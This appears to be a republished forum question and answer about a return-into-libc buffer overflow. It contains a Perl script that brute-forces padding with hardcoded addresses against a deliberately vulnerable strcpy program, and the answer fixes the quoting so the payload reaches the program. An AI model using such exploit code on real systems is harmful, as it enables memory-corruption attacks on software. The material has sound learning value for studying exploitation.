I am messing around with buffer overflows and I’m trying to execute a return

Question

0

Asked: June 15, 20262026-06-15T00:38:45+00:00 2026-06-15T00:38:45+00:00

I am messing around with buffer overflows and I’m trying to execute a return

0

I am messing around with buffer overflows and I’m trying to execute a return into libc vulnerability. To aid me, I have devised the following perl script:

#!/usr/bin/perl

for ($i = 1; $i < 200; $i++) {
    print "count: $i\n";
    system("echo 1 | ./vuln " . "A"x$i . "\x20\x83\x04\x08AAAA\x5c\xf9\xff\xbf");
}

Here is the code I am targeting (./vuln):

#include<stdio.h>
#include<string.h>

main( int argc, char **argv)
{
    char buffer[80];
    printf("%d\n%s\n", strlen(argv[1]), argv[1]);
    getchar();
    strcpy(buffer, argv[1]);
    return 1;
}

And this is the output of the script:

count: 1
1
A
count: 2
2
AA
count: 3
3
AAA
count: 4
4
AAAA
count: 5
5
AAAAA

This indicates that no part of the last string concatenated (the one with lots of hex characters) is being successfully passed as an argument.

What am I doing wrong here?

Report

Leave an answer
Cancel reply

You must login to add an answer.

Need An Account,

1 Answer

Editorial Team · Answer 1 · 2026-06-15T00:38:46+00:00

Editorial Team

2026-06-15T00:38:46+00:00Added an answer on June 15, 2026 at 12:38 am

try this:

system("echo 1 | ./vuln '" . "A"x$i . "\x20\x83\x04\x08AAAA\x5c\xf9\xff\xbf'");

0x20 is space, so without the quotes everything after that is a separate argument.

0

Reply
Share
Share

- Report

Sign Up

Sign In

Forgot Password

The Archive Base Latest Questions

I am messing around with buffer overflows and I’m trying to execute a return

Leave an answerCancel reply

1 Answer

Leave an answer
Cancel reply